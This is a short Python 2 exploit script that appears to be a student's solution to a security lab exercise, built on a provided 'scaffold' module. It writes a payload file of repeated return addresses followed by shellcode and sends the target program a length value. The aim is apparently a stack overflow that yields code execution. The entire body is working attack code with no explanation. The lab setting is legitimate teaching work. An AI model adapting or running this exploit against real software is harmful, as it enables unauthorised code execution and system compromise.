#!/usr/bin/env python2

from scaffold import *

### YOUR CODE STARTS HERE ###

f = open("hack", "w")
f.write("Hello worlds\n")
f.flush() 
f.close()


p.start() 
p.recv(8)

#tssert p.recvline() == 'How many bytes should I read? Here is the file!'
f2 = open("hack", "w")
inputmsg =   42 *  "\xd0\xf6\xff\xbf" + SHELLCODE  + '\n'
f2.write(inputmsg)
f2.flush() 
f2.close() 
#f = open("hack", "a")
#f.write("sdsfsdgsiii f!\n")
#f.flush()
#f.close()
 
p.send(str(len(inputmsg)) + '\n') 
#assert p.recvline() == 'How many bytes should I read? Here is the file!'
#print p.recvline() 
#assert p.recvline() == 'Hello world!'

### YOUR CODE  ENDS  HERE ###

returncode = p.end()

if returncode == -11: print 'segmentation fault or stack canary!'
elif returncode != 0: print 'return code', returncode
